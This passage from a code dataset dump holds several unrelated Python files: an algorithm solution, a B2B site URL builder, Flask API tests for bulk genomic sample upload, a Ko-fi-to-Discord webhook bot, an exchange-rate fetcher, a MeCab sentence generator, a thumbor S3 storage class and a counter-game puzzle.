len(positions) > len(previous):\n for b in previous:\n c = (a << 1) - b\n if c in positions:\n n = previous[b] + subseqs[i][b]\n for j in positions[c]:\n if j <= i:\n break\n subseqs[j][a] += n\n else:\n for c in positions:\n b = (a << 1) - c\n if b in previous:\n n = previous[b] + subseqs[i][b]\n for j in positions[c]:\n subseqs[j][a] += n\n previous[a] += 1\n return sum(sum(p.values()) for p in subseqs)\n\n\n# Main Call\nnums = [2, 4, 6, 8, 10]\nsolution = Solution()\nprint(solution.numberOfArithmeticSlices(nums))\n","sub_path":"src/arrays/numberOfArithmeticSlices_II.py","file_name":"numberOfArithmeticSlices_II.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"215797408","text":"# -*- coding: utf-8 -*-\nimport urllib\n\ni_list = [\n u'礼品工艺品',\\\n u'IT',\\\n u'电子',\\\n u'安防',\\\n u'化工',\\\n u'汽车配件',\\\n u'机械工业',\\\n u'酒店',\\\n u'汽车用品',\\\n u'工程机械',\\\n u'水工业',\\\n u'服装',\\\n u'运动休闲',\\\n u'医药',\\\n u'家居用品',\\\n u'医疗器械',\\\n u'办公用品',\\\n u'建材',\\\n u'广电',\\\n u'家电',\\\n u'影音',\\\n u'五金',\\\n u'塑料',\\\n u'农林牧副渔',\\\n u'通信',\\\n u'纺织',\\\n u'纸业',\\\n u'珠宝首饰',\\\n u'印刷',\\\n u'汽车',\\\n u'冶金矿产',\\\n u'玩具',\\\n u'服装',\\\n u'教育',\\\n u'运动休闲',\\\n u'广告',\\\n u'消防',\\\n u'商业服务',\\\n u'钢铁',\\\n u'交通运输',\\\n u'音响灯光',\\\n u'激光光电子',\\\n u'摩托车及配件',\\\n u'能源',\\\n u'食品工业',\\\n u'机床',\\\n u'房地产',\\\n u'灯饰',\\\n u'环保',\\\n u'丝印特印',\\\n u'美容美发',\\\n u'图书出版',\\\n u'泵阀',\\\n u'卫浴洁具',\\\n u'制药工业',\\\n u'石油',\\\n u'建筑陶瓷',\\\n u'电气',\\\n u'办公用品',\\\n]\n\ndef get_extra_urls():\n w = u'电子'\n w = w.encode('gb2312')\n z=u'中国:广东省:深圳市'\n z = z.encode('gb2312')\n url_list = []\n 
for i in i_list:\n i= i.encode('gb2312')\n if i==u'电子'.encode('gb2312'):\n for j in range(7):\n m = {'i':i,'w':w,'z':z,'mc':\"enterprise\",'j':str(j+1)}\n s = urllib.urlencode(m)\n url = \"http://s.hc360.com/?%s\"%s\n url_list.append(url)\n else:\n m = {'i':i,'w':w,'z':z,'mc':\"enterprise\"}\n s = urllib.urlencode(m)\n url = \"http://s.hc360.com/?%s\"%s\n url_list.append(url)\n\n\n w = u'电子'\n w = w.encode('gb2312')\n z=u'中国:广东省:广州市'\n z = z.encode('gb2312')\n for i in i_list:\n i= i.encode('gb2312')\n m = {'i':i,'w':w,'z':z,'mc':\"enterprise\"}\n s = urllib.urlencode(m)\n url = \"http://s.hc360.com/?%s\"%s\n url_list.append(url)\n\n w = u'电子'\n w = w.encode('gb2312')\n z=u'中国:广东省:东莞市'\n z = z.encode('gb2312')\n for i in i_list:\n i= i.encode('gb2312')\n m = {'i':i,'w':w,'z':z,'mc':\"enterprise\"}\n s = urllib.urlencode(m)\n url = \"http://s.hc360.com/?%s\"%s\n url_list.append(url)\n\n return url_list\n\n","sub_path":"huicong/huicong/spiders/exter_url.py","file_name":"exter_url.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"502740575","text":"import pytest\nfrom app import db, models\nfrom sqlalchemy.orm import joinedload\n\n# GET /api/pipelines\n\n\ndef test_get_pipelines(test_database, client, login_as):\n # Not much to test here, if the endpoint is updated please add more tests\n # Test success\n login_as(\"admin\")\n response = client.get(\"/api/pipelines\")\n assert response.status_code == 200\n assert len(response.get_json()) == 2\n\n\n# GET /api/enums\n\n\ndef test_get_enums(test_database, client, login_as):\n # Test success\n login_as(\"admin\")\n response = client.get(\"/api/enums\")\n assert response.status_code == 200\n assert len(response.get_json()) == 10\n for enumType, enums in response.get_json().items():\n assert enumType is not None\n\n\n# GET /api/metadatasettypes\ndef test_get_metadatasettypes(test_database, client, login_as):\n login_as(\"admin\")\n response = client.get(\"/api/metadatasettypes\")\n assert response.status_code == 200\n assert len(response.get_json()) == 4\n for _, dataset_types in response.get_json().items():\n assert dataset_types is not None and isinstance(dataset_types, list)\n\n\n# GET api/institutions\n\n\ndef test_get_institutions(test_database, client, login_as):\n login_as(\"admin\")\n response = client.get(\"/api/institutions\")\n assert response.status_code == 200\n assert len(response.get_json()) == 21\n for institution in response.get_json():\n assert institution is not None\n\n\n# POST /api/_bulk\ndef test_post_bulk(test_database, client, login_as):\n login_as(\"admin\")\n # Test invalid csv\n badsamplecsv = open(\"tests/badsamplecsv.csv\", \"r\")\n assert (\n client.post(\n \"/api/_bulk\",\n data=badsamplecsv.read(),\n headers={\"Content-Type\": \"text/csv\"},\n ).status_code\n == 400\n )\n # Test not json array\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n json={\n \"family_codename\": \"1001\",\n \"participant_codename\": \"06332\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"gender\": \"Male\",\n \"participant_type\": \"Parent\",\n },\n ).status_code\n == 422\n )\n\n # Test enum error\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"ANYTHING ELSE\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"DEFINITELY NOT AN ENUM\",\n \"dataset_type\": 
\"WGS\",\n \"condition\": \"GermLine\",\n \"gender\": \"Male\",\n \"participant_type\": \"Parent\",\n }\n ],\n ).status_code\n == 400\n )\n\n # Test json array\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n },\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"3420\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WES\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n },\n ],\n ).status_code\n == 200\n )\n # Test csv\n goodcsv = open(\"tests/samplecsv.csv\", \"r\")\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n data=goodcsv.read(),\n headers={\"Content-Type\": \"text/csv\"},\n ).status_code\n == 200\n )\n\n # Test sequencing_date is provided\n assert (\n client.post(\n \"/api/_bulk\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n },\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"3420\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WES\",\n \"condition\": \"GermLine\",\n },\n ],\n ).status_code\n == 400\n )\n\n # Test invalid group query\n assert (\n client.post(\n \"/api/_bulk?groups=torgen&\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n ).status_code\n == 404\n )\n\n # Test correct permission group\n response = client.post(\n \"/api/_bulk?groups=ach\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n )\n\n assert response.status_code == 200\n # check that dataset is linked to group specified in query\n dataset = response.get_json()\n dataset_id = dataset[0][\"dataset_id\"]\n dataset_group = (\n models.Dataset.query.join(models.Dataset.groups)\n .filter(\n models.Group.group_code == \"ach\", models.Dataset.dataset_id == dataset_id\n )\n .one_or_none()\n )\n assert dataset_group is not None\n\n # Test no permission group specified but belongs to multiple groups\n assert (\n client.post(\n \"/api/_bulk\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n ).status_code\n == 400\n )\n\n # Check db for both csv result and json array result\n\n family = (\n models.Family.query.options(joinedload(models.Family.participants))\n .filter(models.Family.family_codename == \"1001\")\n .one_or_none()\n )\n assert family is not None\n assert len(family.participants) == 2\n\n # part = (\n # models.Participant.query\n # .filter(models.Participant.participant_codename == \"06332\")\n # .one_or_none()\n # )\n # assert part.created is None\n\n family = (\n 
models.Family.query.options(joinedload(models.Family.participants))\n .filter(models.Family.family_codename == \"FAM01\")\n .one_or_none()\n )\n assert family is not None\n assert len(family.participants) == 3\n\n random_participant = (\n models.Participant.query.options(\n joinedload(models.Participant.tissue_samples).joinedload(\n models.TissueSample.datasets\n )\n )\n .filter(models.Participant.participant_codename == \"PTP02\")\n .one_or_none()\n )\n assert random_participant is not None\n assert len(random_participant.tissue_samples) == 1\n assert len(random_participant.tissue_samples[0].datasets) == 1\n\n\ndef test_post_bulk_user(test_database, client, login_as):\n login_as(\"user\")\n # Test allowed permission groups\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n ).status_code\n == 200\n )\n # Test no group query parameter, but user only belongs to one group\n assert (\n client.post(\n \"/api/_bulk\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n ).status_code\n == 200\n )\n login_as(\"user_b\")\n # Test no permission groups\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n ).status_code\n == 404\n )\n login_as(\"user_a\")\n # Test multiple permission groups, none specified\n assert (\n client.post(\n \"/api/_bulk\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n ).status_code\n == 400\n )\n\n # Test multiple permission groups, one specified\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n ).status_code\n == 200\n )\n\n\ndef test_bulk_multiple_csv(test_database, client, login_as):\n login_as(\"admin\")\n\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n data=\"\"\"\nfamily_codename,participant_codename,participant_type,tissue_sample_type,dataset_type,sex,condition,sequencing_date,linked_files,notes\nHOOD,HERO,Proband,Saliva,WGS,Female,GermLine,2020-12-17,/path/foo|/path/bar||,\nHOOD,HERO,Proband,Saliva,WGS,Female,GermLine,2020-12-17,/path/yeet|/path/cross|/foo/bar,three\n\"\"\",\n headers={\"Content-Type\": \"text/csv\"},\n ).status_code\n == 200\n )\n\n for dataset in models.Dataset.query.all():\n print(dataset)\n assert models.Dataset.query.count() == 6\n assert models.DatasetFile.query.count() == 5\n assert models.TissueSample.query.count() == 5\n assert models.Participant.query.count() == 4\n assert models.Family.query.count() == 3\n\n\ndef 
test_bulk_multiple_json(test_database, client, login_as):\n login_as(\"admin\")\n\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n json=[\n {\n \"family_codename\": \"HOOD\",\n \"participant_codename\": \"HERO\",\n \"participant_type\": \"Proband\",\n \"tissue_sample_type\": \"Saliva\",\n \"dataset_type\": \"WGS\",\n \"sex\": \"Female\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n \"linked_files\": [\"/otonashi/yuzuru\", \"/tachibana/kanade\"],\n },\n {\n \"family_codename\": \"HOOD\",\n \"participant_codename\": \"HERO\",\n \"participant_type\": \"Proband\",\n \"tissue_sample_type\": \"Saliva\",\n \"dataset_type\": \"WES\",\n \"sex\": \"Female\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n \"linked_files\": [\n \"\",\n \"/perfectly/balanced\",\n \"/as/all/things/should/be\",\n ],\n },\n ],\n ).status_code\n == 200\n )\n\n assert models.Dataset.query.count() == 6\n assert models.DatasetFile.query.count() == 4\n assert models.TissueSample.query.count() == 5\n assert models.Participant.query.count() == 4\n assert models.Family.query.count() == 3\n","sub_path":"flask/tests/test_misc.py","file_name":"test_misc.py","file_ext":"py","file_size_in_byte":13597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"46692707","text":"import traceback\nimport json\nimport util_functions\nfrom discord.ext import commands\nimport discord\nimport sys\nimport re\nimport os\nimport asyncio\nfrom aiohttp import web\nimport datetime\n\nbotToken = os.environ.get('botToken')\n\ndef run_app(app, *, host='0.0.0.0', port=80, shutdown_timeout=60.0, ssl_context=None, print=print, backlog=128):\n \"\"\"Run an app\"\"\"\n if port is None:\n if not ssl_context:\n port = 8080\n else:\n port = 8443\n\n loop = app.loop\n\n handler = app.make_handler()\n server = loop.create_server(handler, host, port, ssl=ssl_context, backlog=backlog)\n srv, startup_res = loop.run_until_complete(asyncio.gather(server, app.startup(), loop=loop))\n\n scheme = 'https' if ssl_context else 'http'\n print(\"======== Running on {scheme}://{host}:{port}/ ========\\n\"\n \"(Press CTRL+C to quit)\".format(\n scheme=scheme, host=host, port=port))\n\nasync def tba_handler(request):\n data = await request.post()\n data = json.loads(data['data'])\n print(\"Accepted request:\\n{}\".format(data))\n print(\"{}\".format(data))\n embed = discord.Embed(\n title=\"Ko-Fi Received!\", \n url=\"https://ko-fi.com/eylesis\", \n description=\"{} has sent ${}.\".format(data['from_name'], data['amount']))\n embed.set_footer(text=\"Ko-Fi Notification\")\n \n if data['message'] == \"\":\n data['message'] == \"No Message.\"\n embed.add_field(name=\"__Message__\", value=data['message'])\n\n channelids = {'470455397912674305'}\n for channelid in channelids:\n await bot.send_message(bot.get_channel(channelid), embed=embed)\n return web.Response()\n \n\nbot = commands.Bot(command_prefix='*')\nloop = bot.loop\napp = web.Application(loop=loop)\napp.router.add_post('/endpoint', tba_handler)\n\n\n\n\nif __name__ == \"__main__\":\n run_app(app, host=os.environ.get('HOST'), port=os.environ.get('PORT'))\n bot.run(botToken)","sub_path":"KofiFriend_Brain.py","file_name":"KofiFriend_Brain.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"648574208","text":"import matplotlib\nmatplotlib.use(\"Qt5Agg\")\nfrom multiprocessing import freeze_support\nfrom common.dummyStream 
import test_stdout\nfrom PyQt5.QtWidgets import QApplication\nfrom forms.main_form import MainWindow\nfrom common import routines\nimport argparse\nimport sys\nimport os\n\ndef update_data(data_dir, athletes_db):\n    data_dir = routines.process_path(data_dir)\n    for athlete_dir in os.listdir(data_dir):\n        if not os.path.isdir(data_dir + athlete_dir):\n            continue\n        athletes_db.update_athlete_info(athlete_dir, routines.process_path(data_dir + athlete_dir))\n\n\nif __name__ == '__main__':\n    test_stdout()\n    freeze_support()\n    os.chdir(os.path.abspath(os.path.dirname(sys.argv[0])))\n    routines.set_env_variable('FITDUMP_ROOT', routines.process_path(os.path.abspath(os.curdir)))\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--data_dir', dest='data_dir', action='store',\n                        default=os.path.abspath(os.curdir) + '/test_data', help='directory with data files')\n    parser.add_argument('--db', dest='db', action='store', default='db.sqlite3',\n                        help='path to the SQLite database file')\n    parser.add_argument(dest='command', action='store', help='not used', nargs='*')\n    args = parser.parse_args()\n\n    app = QApplication(sys.argv)\n    main_windows = MainWindow(args.data_dir, args.db)\n    main_windows.show()\n    sys.exit(app.exec_())","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"203298629","text":"#!/usr/bin/env python3\n\nimport sys\nimport json\nimport datetime\nimport logging\nimport requests\nimport configparser\n\ndef main():\n    \"\"\"\n    Main function to run the code.\n    \"\"\"\n    # set up log file\n    logging.basicConfig(filename='exchange_rate_info.log', format='%(asctime)s %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')\n    print (\"[{0:%d/%m/%Y %I:%M:%S %p}] Checking config file.\".format(datetime.datetime.now()))\n    # check existence of config file\n    (url, access_key) = read_config()\n    if (url == 'None' or access_key == 'None'):\n        print (\"[{0:%d/%m/%Y %I:%M:%S %p}] Warning : Config file not found or not set up correctly. Please ensure a config file is set up with required connection parameters.\".format(datetime.datetime.now()))\n        sys.exit(0)\n    # HTTPS Header\n    headers = {'Content-Type': 'application/json'}\n    # log progress\n    print (\"[{0:%d/%m/%Y %I:%M:%S %p}] Retrieving latest data.\".format(datetime.datetime.now()))\n    # get the latest exchange rates from fixer.io in JSON format\n    rate_info = get_response(get_url(url, access_key), headers)\n\n    if rate_info is not None:\n        if (not rate_info['success']):\n            print (\"[{0:%d/%m/%Y %I:%M:%S %p}] Error : {1}\".format(datetime.datetime.now(), rate_info['error']['info']))\n            #print (rate_info['error']['info'])\n        else:\n            # log progress\n            print (\"[{0:%d/%m/%Y %I:%M:%S %p}] Displaying Currency Rates.\".format(datetime.datetime.now()))\n            display_rates(rate_info)\n    else:\n        print('[!] Request Failed')\n\ndef get_url(api_url_base, api_access_key):\n    \"\"\"\n    Gets the full Web API url.\n    \"\"\"\n    # Fixer.io format\n    api_format = '1'\n    # Fixer.io base currency\n    api_base_currency = 'AUD'\n\n    return (api_url_base.format(api_access_key, api_format))\n\ndef get_response(address, header):\n    \"\"\"\n    Gets the JSON data from the Web API.\n    \"\"\" \n    # REST Web API URL\n    api_url = address\n    # JSON response\n    response = requests.get(api_url, headers=header)\n    # HTTP response check\n    if response.status_code == 200:\n        return json.loads(response.content.decode('utf-8'))\n    else:\n        return None\n\ndef read_config():\n    \"\"\"\n    Reads the data source settings from the config file.\n    \"\"\"\n    config = configparser.ConfigParser()\n    try:\n        config.read('config.ini')\n    except Exception as e:\n        logging.error(e)\n        print (\"No config file found!\")\n        sys.exit(0)\n    else:\n        base_url = config.get('DEFAULT', 'url', fallback='None')\n        access_key = config.get('DEFAULT', 'key', fallback='None')\n\n        return (base_url, access_key)\n\ndef display_rates(exchange_rates):\n    \"\"\"\n    Displays the currency rates. \n    \"\"\"\n    base_AUD_rate = 1\n\n    for k,v in exchange_rates['rates'].items():\n        if k == 'AUD':\n            base_AUD_rate = v\n\n    for k,v in exchange_rates['rates'].items():\n        currency_code = k\n        currency_rate = round(v / base_AUD_rate, 2)\n        print ('[{0:%d/%m/%Y %I:%M:%S %p}] 1 AUD = {1} {2}'.format(datetime.datetime.now(), currency_rate, currency_code)) \n\n# Standard boilerplate to call the main() function to begin\n# the program.\nif __name__ == '__main__':\n    main()","sub_path":"Exchange Rate Info/exchange-rate-info.py","file_name":"exchange-rate-info.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"139419781","text":"import MeCab\nimport random\n\n# Morphological analysis\ndef MorphologicalAnalysis(text):\n    mecab = MeCab.Tagger(\"-Ochasen\")\n    mecab.parse('')  # prevent the string from being garbage collected\n    node = mecab.parseToNode(text)\n    sentence = []\n    sentence_pos = []\n\n    while node:\n        # get the word\n        word = node.surface\n        # get the part of speech\n        pos = node.feature.split(\",\")[0]\n        sentence.append(word)\n        sentence_pos.append(pos)\n        # move on to the next word\n        node = node.next\n\n    sentence.pop(0)\n    sentence.pop(-1)\n    sentence_pos.pop(0)\n    sentence_pos.pop(-1)\n    return sentence, sentence_pos\n\n\ndef PhraseMorphologicalAnalysis(phrase):\n    mecab = MeCab.Tagger(\"-Ochasen\")\n    mecab.parse('')  # prevent the string from being garbage collected\n    node = mecab.parseToNode(phrase)\n    sentence_pos = []\n\n    while node:\n        # get the word\n        word = node.surface\n        # get the part of speech\n        pos = node.feature.split(\",\")[0]\n        sentence_pos.append(pos)\n        # move on to the next word\n        node = node.next\n\n    sentence_pos.pop(0)\n    sentence_pos.pop(-1)\n    return sentence_pos\n\n\n# ngrams\ndef Ngrams(n, text):\n    sentence, sentence_pos = MorphologicalAnalysis(text)\n    ngrams_list = []\n    ngrams_pos = []\n    for i in range(len(sentence)-n+1):\n        ngrams_list.append(sentence[i:i+n])\n        ngrams_pos.append(sentence_pos[i:i+n])\n\n    return ngrams_list, ngrams_pos\n\n\ndef MakingDocument(n, text):\n    sentence, sentence_pos = Ngrams(n, text)\n    i = 0\n    index = 0\n    next_phrase = \"\"\n    makingSentence = []\n    candidate = []\n    while i <= 3:\n\n        if len(makingSentence) == 0:\n            for sen, sen_pos in zip(sentence, sentence_pos):\n                if sen_pos[0] == \"名詞\":\n                    candidate.append(sen)\n\n            index = random.randrange(0, len(candidate))\n            next_phrase = candidate[index][0]\n            makingSentence.append(next_phrase)\n            candidate.clear()\n            continue\n\n\n        if next_phrase == \"の\":\n            for sen, sen_pos in zip(sentence, sentence_pos):\n                if sen_pos[0] not in (\"動詞\", \"助詞\", \"助動詞\", \"記号\"):\n                    candidate.append(sen)\n\n            index = random.randrange(0, len(candidate))\n            next_phrase = candidate[index][0]\n            makingSentence.append(next_phrase)\n            candidate.clear()\n            continue\n\n\n        if next_phrase == \".\" or next_phrase == \",\":\n            for sen, sen_pos in zip(sentence, sentence_pos):\n                if sen_pos[0] == \"名詞\":\n                    candidate.append(sen)\n\n            if next_phrase == \".\":\n                i += 1\n                if i == 3:\n                    break\n\n            index = random.randrange(0, len(candidate))\n            next_phrase = candidate[index][0]\n            makingSentence.append(next_phrase)\n            candidate.clear()\n            continue\n\n\n        if PhraseMorphologicalAnalysis(makingSentence[-1]) == \"助動詞\":\n            makingSentence.append(\".\")\n\n\n        index = random.randrange(0, len(sentence))\n        next_phrase = sentence[index][0]\n        while next_phrase == makingSentence[-1][0] or sentence_pos[index][0] == PhraseMorphologicalAnalysis(makingSentence[-1]):\n            index = random.randrange(0, len(sentence))\n            next_phrase = sentence[index][0]\n\n        makingSentence.append(next_phrase)\n\n\n\n    makingSentence = \"\".join(makingSentence)\n    print(makingSentence)\n\n\n\nf = open(\"sentence_data.txt\", \"r\", encoding=\"utf-8\")\ndataList = f.readlines()\nfor i in range(len(dataList)):\n    sen = dataList[i].strip()\n    dataList[i] = sen\n\ntext2 = \"\".join(dataList)\nsentences2, sentence_pos2 = Ngrams(3, text2)\n\nMakingDocument(3, text2)\n#print(sentences2)\n#print(sentence_pos2)\n\nf.close()\n","sub_path":"sentence.py","file_name":"sentence.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"621044563","text":"#coding: utf-8\n\n# Copyright (c) 2015-2016, thumbor-community\n# Use of this source code is governed by the MIT license that can be\n# found in the LICENSE file.\nfrom os.path import splitext\n\nfrom json import dumps, loads\n\nfrom botocore.exceptions import BotoCoreError, ClientError\n\nfrom thumbor.storages import BaseStorage\nfrom thumbor.utils import logger\n\nfrom ..aws.storage import AwsStorage\n\nclass Storage(AwsStorage, BaseStorage):\n    \"\"\"\n    S3 Storage\n    \"\"\"\n    def __init__(self, context):\n        \"\"\"\n        Constructor\n        :param Context context: Thumbor's context\n        \"\"\"\n        BaseStorage.__init__(self, context)\n        AwsStorage.__init__(self, context, 'TC_AWS_STORAGE')\n        self.storage_expiration_seconds = context.config.get('STORAGE_EXPIRATION_SECONDS', 3600)\n\n\n    async def put(self, path, file_bytes):\n        \"\"\"\n        Stores image\n        :param string path: Path to store data at\n        :param bytes file_bytes: Data to store\n        :rtype: string\n        \"\"\"\n        try:\n            await self._put_object(file_bytes, self._normalize_path(path))\n        except BotoCoreError as err:\n            logger.exception('Unable to store object: %s', err)\n            return None\n\n        return path\n\n    async def put_crypto(self, path):\n        \"\"\"\n        Stores crypto data at given path\n        :param string path: Path to store the data at\n        :return: Path where the crypto data is stored\n        \"\"\"\n        if not self.context.config.STORES_CRYPTO_KEY_FOR_EACH_IMAGE:\n            return\n\n        if not self.context.server.security_key:\n            raise RuntimeError(\n                \"STORES_CRYPTO_KEY_FOR_EACH_IMAGE can't be \"\n                \"True if no SECURITY_KEY specified\"\n            )\n\n        file_abspath = self._normalize_path(path)\n        crypto_path = '%s.txt' % splitext(file_abspath)[0]\n\n        try:\n            await self._put_object(self.context.server.security_key.encode('utf-8'), crypto_path)\n        except BotoCoreError as err:\n            logger.exception('Unable to store crypto object: %s', err)\n            return None\n\n        
logger.debug(\n \"Stored crypto at %s (security key: %s)\",\n crypto_path,\n self.context.server.security_key,\n )\n\n return file_abspath\n\n async def put_detector_data(self, path, data):\n \"\"\"\n Stores detector data at given path\n :param string path: Path to store the data at\n :param string data: Data to store\n :return: Path where the data is stored\n :rtype: string\n \"\"\"\n file_abspath = self._normalize_path(path)\n\n path = '%s.detectors.txt' % splitext(file_abspath)[0]\n\n try:\n await self._put_object(dumps(data).encode('utf-8'), path)\n except BotoCoreError as err:\n logger.exception('Unable to store detector data: %s', err)\n return None\n\n return file_abspath\n\n async def get_crypto(self, path):\n \"\"\"\n Retrieves crypto data at path\n :param string path: Path to search for crypto data\n \"\"\"\n file_abspath = self._normalize_path(path)\n crypto_path = \"%s.txt\" % (splitext(file_abspath)[0])\n\n try:\n file_key = await self.storage.get(crypto_path)\n except ClientError as err:\n logger.warn(\"[STORAGE] s3 key not found at %s\" % crypto_path)\n return None\n\n async with file_key['Body'] as stream:\n file_key = await stream.read()\n\n return file_key.decode('utf-8')\n\n async def get_detector_data(self, path):\n \"\"\"\n Retrieves detector data from storage\n :param string path: Path where the data is stored\n \"\"\"\n file_abspath = self._normalize_path(path)\n path = '%s.detectors.txt' % splitext(file_abspath)[0]\n\n try:\n file_key = await self.storage.get(path)\n except ClientError:\n return None\n\n if not file_key or self.is_expired(file_key) or 'Body' not in file_key:\n return None\n\n async with file_key['Body'] as stream:\n return loads(await stream.read())\n\n async def get(self, path):\n \"\"\"\n Gets data at path\n :param string path: Path for data\n \"\"\"\n\n try:\n file = await super(Storage, self).get(path)\n except BotoCoreError:\n return None\n\n async with file['Body'] as stream:\n return await stream.read()\n\n async def exists(self, path):\n \"\"\"\n Tells if data exists at given path\n :param string path: Path to check\n \"\"\"\n file_abspath = self._normalize_path(path)\n return await self.storage.exists(file_abspath)\n\n async def remove(self, path):\n \"\"\"\n Deletes data at path\n :param string path: Path to delete\n \"\"\"\n return await self.storage.delete(self._normalize_path(path))\n\n","sub_path":"tc_aws/storages/s3_storage.py","file_name":"s3_storage.py","file_ext":"py","file_size_in_byte":4918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"220272798","text":"import math\n\ndef counterGame(n, t):\n # Caso base\n if n == 1:\n return t\n # Es potencia de 2\n elif (n & (n-1) == 0):\n return counterGame(int(n >> 1), t + 1)\n # No es potencia\n else:\n bit = -2\n lg = n\n while lg:\n lg >>= 1\n bit += 1\n return counterGame(n - int(2 << bit), t + 1)\n\nnums = []\nfor i in range(int(input())):\n nums.append(int(input()))\n\n# Por cada juego\nfor n in nums:\n if counterGame(n,0) & 1:\n print(\"Louise\")\n else:\n print(\"Richard\")\n","sub_path":"Algoritmia/Contest2/CounterGame.py","file_name":"CounterGame.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"332464652","text":"def heat_kernel_smoothing(vtx, fac, data, adjm, sigma, n_smooth):\n \"\"\"\n This function performs heat kernel smoothing [1,2,3] on a triangle mesh. The code is mainly \n adapted from the matlab code by Chung et al. 
